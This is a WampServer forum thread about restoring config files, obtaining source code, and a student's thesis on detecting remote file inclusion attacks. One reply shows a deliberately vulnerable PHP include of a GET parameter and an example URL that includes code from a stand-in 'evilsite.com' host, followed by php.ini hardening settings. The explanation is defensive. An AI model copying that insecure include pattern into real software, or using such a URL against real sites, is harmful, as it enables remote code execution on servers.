WampServer

I corrupted my wampmanager.tpl and wampmanager.ini files this afternoon. I could restore a backup but I think it'd be easier to replace just those two files. The files on sourceforge appear to be install packages and there's nothing in CVS. Could someone point me to the source files for wampmanager?


Thank you,

Derek Cooper

Unfortunatly. its not that easy.. the ini file is built when wamp starts.. it loads in the TPL file as well as plenty of other things...

problem is .. you need a INI file to start wamp... and each ini file is different.. for each version...

i have source for all wamp packages.. so as long as you havent changed the versoin numbers.. i can send them to you..

what version of apache php and mysql are installed and if you know the wamp version too

Steven Martin
stevenmartin99@gmail.com
stevenmartin99@hotmail.com
PampServer.com - [pampserver.com]

I found my backup disk and restored from there. It worked fine.

Thanks,
Derek Cooper

you should backup before any edit

to setup backup, follow this
[blog.jlbn.net]

Have fun,

FREE One A Day
FREE Photo
FREE Games
FREE Websites
FREE Portable GPS
FREE WAMP Guides

i need the code for wampserver 2.0i so bad. can you please send them to me? and how do i build and compile the source code? thanks very much.

sorry i cant. its 150mb. iv no way of sending that and no time to write instructions on the build/compile setup..

i have made a new release of wampserver - you can see it on the top of the forum with the latest versions.

If its something small you need changed in 2.0i drop me a mail and i can compile it for you and stick the 16mb file up on my server for you to download.

I will get around to writing instructions for wampserver complimation , but i doubt it will be this month.

thanks Steven

Steven Martin
stevenmartin99@gmail.com
stevenmartin99@hotmail.com
PampServer.com - [pampserver.com]

i see. well what i was actually trying to do was detect/determine the incoming request from the client so i'll know the URL of the page the client wants to access. do you know how i could do so even without the source code for the wampserver? please i do really need your help. thanks

Of course.

Php can get u the ip address , and using ip2country db u can find out about the user.

Steven Martin
stevenmartin99@gmail.com
stevenmartin99@hotmail.com
PampServer.com - [pampserver.com]

it's not the client's ip address that i need, it's the URL of the page that the client requested for (the file located in your server that the client wants to access). could PHP handle this too?

how can they request a page , and the server would not know about it?


i think your just confused,

Quote

detect/determine the incoming request from the client so i'll know the URL of the page the client wants to access

This is what a server does.. full stop..

Steven Martin
stevenmartin99@gmail.com
stevenmartin99@hotmail.com
PampServer.com - [pampserver.com]

yes i do know that. i'm actually trying to create a program for our thesis which can detect remote file inclusion (RFI) attacks by processing the URL. the program has to be able to prevent the server from sending a response back to the client. now how am i supposed to start creating this program? any suggestions?

Hi

i am also looking for the source code and i know you siad this:
stevenmartin99 Wrote:
-------------------------------------------------------
> sorry i cant. its 150mb. iv no way of sending
> that and no time to write instructions on the
> build/compile setup..

But i just gonna ask if you cant send it maybe you could upload it to Source Forge
as you have an svn set up.

and just a thought... maybe you could ask to be a meber of the official project and update it?

Remote file inclusion (RFI) ?
File request by another hostname ?

Check .htaccess possibilities with RewriteCond.
Like preventing images to be hotlinked, maybe you can prevent RFI...

Florian

WampServer Patch (Screenshots)
Topic EN : www.wampserver.com
Topic FR : www.wampserver.com

Not exactly ,

look at this code example

index.php

<?php
$filename = $_GET['file'];
include $filename.".php";
?>

Someone goes the site http: //mysite.com?file=11 and is brought to page 11. GREAT!

Some goes to http: //mysite.com?file=http://evilsite.com/evil_virus_code.txt? and now the virus code is included in your page.


To stop this happening- in the php.ini change the following
-------------------------------------------
allow_url_fopen = OFF
allow_url_include = OFF
register_globals = OFF

Steven Martin
stevenmartin99@gmail.com
stevenmartin99@hotmail.com
PampServer.com - [pampserver.com]



Edited 3 time(s). Last edit at 09/07/2010 10:02AM by stevenmartin99.

but our group's thesis proposal was developing a security mechanism for web servers against RFI attacks and it has already been approved. i already know about those three functions in the php,ini configuration. the program we are supposed to create should not depend on the configuration.